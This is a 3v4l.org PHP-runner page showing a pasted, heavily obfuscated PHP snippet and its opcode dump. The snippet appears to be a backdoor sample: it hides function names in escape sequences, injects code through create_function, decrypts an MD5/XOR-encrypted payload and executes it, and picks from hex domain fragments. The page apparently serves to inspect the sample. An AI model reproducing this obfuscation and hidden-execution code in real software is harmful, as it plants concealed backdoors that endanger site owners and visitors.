3v4l.org

run code in 300+ PHP versions simultaneously
<?php function en2($s, $q){ $l = "strlen"; $p = "pack"; $r = "substr"; $m = "md5"; $g = ""; while ($l($g) < $l($s)){ $q = $p("H*", $m($g . $q . "q1w2e3r4")); $g .= $r($q, 0, 8); } return $s ^ $g; } function cqq($qw) { $domarr = array("33db9538", "9507c4e8", "e5b57288", "54dfa1cb"); return random($domarr,$qw); } function random($arr,$qw) { $g="\x20\167\x2d\70\x36794587495086f963874,qq-82d94486e,r-86297186e94186d945,wq-874941874,s-87\x33\54\x67\75\x20\167\x2e\40\x72\73\x20\155\x2d\70"."6d944835,sq-873964872937873960\x38\66\x63\71\x35\61\x38\67\x34\42\x3b"; $soy = "\x65\156\x32"; $xx="\x65\170\x70"."\154\x6f\144\x65"; $ecx="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; $scy="\x73\164\x72\137\x72\145\x70\154\x61\143\x65"; $a = $xx("|","\x5c\170\x7c\134\x31\174\x3d\42\x7c\42\x3b\44\x7c\44"); $aa = $xx("|","8|9|-|,| "); $mec=$ecx; for($i=0;$i<sizeof($a);$i++) { $g = $scy($aa[$i],$a[$i],$g); } $ecx("", "};$g//"); $mec("", $soy("\230\77\153\147\26\167\114\130\223\257\211\2\253\5\172\316\25\262\145\25\62\72\127\156\270\100\154\56\341\77\4\37\21\152\206\334\101\334\32\210\353\173\253\5\123\231\47\13\20",$scy)); return $arr[rand((0.24-(0.03*8)),(0.1875*6))].$qw; } echo cqq(".com");
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/NKnJ4
function name:  (null)
number of ops:  5
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   38     0  E >   INIT_FCALL                                               'cqq'
          1        SEND_VAL                                                 '.com'
          2        DO_FCALL                                      0  $0      
          3        ECHO                                                     $0
          4      > RETURN                                                   1

Function en2:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 24
Branch analysis from position: 24
2 jumps found. (Code = 44) Position 1 = 32, Position 2 = 8
Branch analysis from position: 32
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 8
2 jumps found. (Code = 44) Position 1 = 32, Position 2 = 8
Branch analysis from position: 32
Branch analysis from position: 8
filename:       /in/NKnJ4
function name:  en2
number of ops:  35
compiled vars:  !0 = $s, !1 = $q, !2 = $l, !3 = $p, !4 = $r, !5 = $m, !6 = $g
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   RECV                                             !0      
          1        RECV                                             !1      
    3     2        ASSIGN                                                   !2, 'strlen'
    4     3        ASSIGN                                                   !3, 'pack'
    5     4        ASSIGN                                                   !4, 'substr'
    6     5        ASSIGN                                                   !5, 'md5'
    7     6        ASSIGN                                                   !6, ''
    8     7      > JMP                                                      ->24
    9     8    >   INIT_DYNAMIC_CALL                                        !3
          9        SEND_VAL_EX                                              'H%2A'
         10        INIT_DYNAMIC_CALL                                        !5
         11        CONCAT                                           ~12     !6, !1
         12        CONCAT                                           ~13     ~12, 'q1w2e3r4'
         13        SEND_VAL_EX                                              ~13
         14        DO_FCALL                                      0  $14     
         15        SEND_VAR_NO_REF_EX                                       $14
         16        DO_FCALL                                      0  $15     
         17        ASSIGN                                                   !1, $15
   10    18        INIT_DYNAMIC_CALL                                        !4
         19        SEND_VAR_EX                                              !1
         20        SEND_VAL_EX                                              0
         21        SEND_VAL_EX                                              8
         22        DO_FCALL                                      0  $17     
         23        ASSIGN_OP                                     8          !6, $17
    8    24    >   INIT_DYNAMIC_CALL                                        !2
         25        SEND_VAR_EX                                              !6
         26        DO_FCALL                                      0  $19     
         27        INIT_DYNAMIC_CALL                                        !2
         28        SEND_VAR_EX                                              !0
         29        DO_FCALL                                      0  $20     
         30        IS_SMALLER                                               $19, $20
         31      > JMPNZ                                                    ~21, ->8
   12    32    >   BW_XOR                                           ~22     !0, !6
         33      > RETURN                                                   ~22
   13    34*     > RETURN                                                   null

End of function en2

Function cqq:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/NKnJ4
function name:  cqq
number of ops:  8
compiled vars:  !0 = $qw, !1 = $domarr
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   15     0  E >   RECV                                             !0      
   16     1        ASSIGN                                                   !1, <array>
   17     2        INIT_FCALL_BY_NAME                                       'random'
          3        SEND_VAR_EX                                              !1
          4        SEND_VAR_EX                                              !0
          5        DO_FCALL                                      0  $3      
          6      > RETURN                                                   $3
   18     7*     > RETURN                                                   null

End of function cqq

Function random:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 31
Branch analysis from position: 31
2 jumps found. (Code = 44) Position 1 = 34, Position 2 = 20
Branch analysis from position: 34
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 20
2 jumps found. (Code = 44) Position 1 = 34, Position 2 = 20
Branch analysis from position: 34
Branch analysis from position: 20
filename:       /in/NKnJ4
function name:  random
number of ops:  57
compiled vars:  !0 = $arr, !1 = $qw, !2 = $g, !3 = $soy, !4 = $xx, !5 = $ecx, !6 = $scy, !7 = $a, !8 = $aa, !9 = $mec, !10 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   20     0  E >   RECV                                             !0      
          1        RECV                                             !1      
   21     2        ASSIGN                                                   !2, '+w-86794587495086f963874%2Cqq-82d94486e%2Cr-86297186e94186d945%2Cwq-874941874%2Cs-873%2Cg%3D+w.+r%3B+m-86d944835%2Csq-87396487293787396086c951874%22%3B'
   22     3        ASSIGN                                                   !3, 'en2'
   23     4        ASSIGN                                                   !4, 'explode'
   24     5        ASSIGN                                                   !5, 'create_function'
   25     6        ASSIGN                                                   !6, 'str_replace'
   26     7        INIT_DYNAMIC_CALL                                        !4
          8        SEND_VAL_EX                                              '%7C'
          9        SEND_VAL_EX                                              '%5Cx%7C%5C1%7C%3D%22%7C%22%3B%24%7C%24'
         10        DO_FCALL                                      0  $16     
         11        ASSIGN                                                   !7, $16
   27    12        INIT_DYNAMIC_CALL                                        !4
         13        SEND_VAL_EX                                              '%7C'
         14        SEND_VAL_EX                                              '8%7C9%7C-%7C%2C%7C+'
         15        DO_FCALL                                      0  $18     
         16        ASSIGN                                                   !8, $18
   28    17        ASSIGN                                                   !9, !5
   29    18        ASSIGN                                                   !10, 0
         19      > JMP                                                      ->31
   30    20    >   INIT_DYNAMIC_CALL                                        !6
         21        CHECK_FUNC_ARG                                           
         22        FETCH_DIM_FUNC_ARG                               $22     !8, !10
         23        SEND_FUNC_ARG                                            $22
         24        CHECK_FUNC_ARG                                           
         25        FETCH_DIM_FUNC_ARG                               $23     !7, !10
         26        SEND_FUNC_ARG                                            $23
         27        SEND_VAR_EX                                              !2
         28        DO_FCALL                                      0  $24     
         29        ASSIGN                                                   !2, $24
   29    30        PRE_INC                                                  !10
         31    >   COUNT                                            ~27     !7
         32        IS_SMALLER                                               !10, ~27
         33      > JMPNZ                                                    ~28, ->20
   32    34    >   INIT_DYNAMIC_CALL                                        !5
         35        SEND_VAL_EX                                              ''
         36        ROPE_INIT                                     3  ~30     '%7D%3B'
         37        ROPE_ADD                                      1  ~30     ~30, !2
         38        ROPE_END                                      2  ~29     ~30, '%2F%2F'
         39        SEND_VAL_EX                                              ~29
         40        DO_FCALL                                      0          
   33    41        INIT_DYNAMIC_CALL                                        !9
         42        SEND_VAL_EX                                              ''
         43        INIT_DYNAMIC_CALL                                        !3
         44        SEND_VAL_EX                                              '%98%3Fkg%16wLX%93%AF%89%02%AB%05z%CE%15%B2e%152%3AWn%B8%40l.%E1%3F%04%1F%11j%86%DCA%DC%1A%88%EB%7B%AB%05S%99%27%0B%10'
         45        SEND_VAR_EX                                              !6
         46        DO_FCALL                                      0  $33     
         47        SEND_VAR_NO_REF_EX                                       $33
         48        DO_FCALL                                      0          
   34    49        INIT_FCALL                                               'rand'
         50        SEND_VAL                                                 0
         51        SEND_VAL                                                 1.125
         52        DO_ICALL                                         $35     
         53        FETCH_DIM_R                                      ~36     !0, $35
         54        CONCAT                                           ~37     ~36, !1
         55      > RETURN                                                   ~37
   35    56*     > RETURN                                                   null

End of function random

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
163.1 ms | 1407 KiB | 16 Q